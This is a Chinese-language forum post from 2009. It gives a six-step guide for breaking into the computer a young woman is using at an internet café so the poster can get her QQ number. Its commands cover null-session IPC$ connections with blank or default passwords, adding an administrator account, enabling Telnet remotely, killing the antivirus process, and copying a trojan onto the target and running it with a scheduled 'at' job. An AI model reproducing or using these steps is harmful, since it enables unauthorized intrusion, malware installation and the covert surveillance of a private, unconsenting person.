|
楼主 |
发表于 2009-1-3 05:34:15
|
显示全部楼层
|阅读模式
来自 河南省驻马店市
第一步:先要确定MM所用电脑的IP,网吧电脑的编号和IP地址通常是相同或是高一位,比如网吧中编号为20的电脑,IP一般是192.168.0.20或192.168.0.21(192.168.0.1留给路由器),不仅如此,机器名也有规律,20号电脑的机器名通常是Wangba20,这样只要知道了MM用的电脑,再进入到“命令提示符”,Ping Wangba20就可以得到IP地址,比如192.168.0.20。
第二步:有了IP,就可以开始连接上MM的电脑了,由于网吧内的电脑多使用没有打过补丁的Windows 2000,而且登录电脑的用户名也多是“user编号”的形式空密码形式,所以在“命令提示符”下输入net use //192.168.0.20/ipc$ \"\" /user:\"\"及net use //192.168.0.20/ipc$ \"\" /user:\"user20\"命令建立连接。
连接成功后,就要关闭对方电脑中的杀毒软件了,右击“我的电脑”,选择“管理”,在弹出窗口中右击“计算机管理(本地)”,选择“连接到另一台计算机”,连接至192.168.0.20,启动“Telnet”服务(“计算机管理”可以直接管理远程电脑)
第三步:在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。
net user user20 /add
net localgroup administrators user20 /add
第四步:进入到C:\\Winnt\\System32,右击CMD.EXE,选择“创建快捷方式”,然后右击新建的快捷方式,选择“属性”,勾选“以其用户身份运行”(见图2)(图2以其他用户身份运行程序)。运行快捷方式CMD,弹出“以其他用户身份运行”窗口后,输入“user20”回车。
第五步:用telnet 192.168.0.20登录至MM的电脑,再从网上下载一个命令行下杀进程的软件,如knlps等,在telnet上将杀毒软件的进程关闭。
第六步:现在就可以下载一个木马,用“copy 木马名.exe //192.168.0.20/admin$”的方法将木马复制到MM的电脑上。再用net time //192.168.0.20得到MM电脑的时间,比如是下午4点,最后用“at //192.168.0.20 时间 木马名.exe”,如“at //192.168.0.20 16:02 木马名.exe”命令在指定时间运行木马。
有了木马了,自然就能知道MM用的QQ号啦。 |
|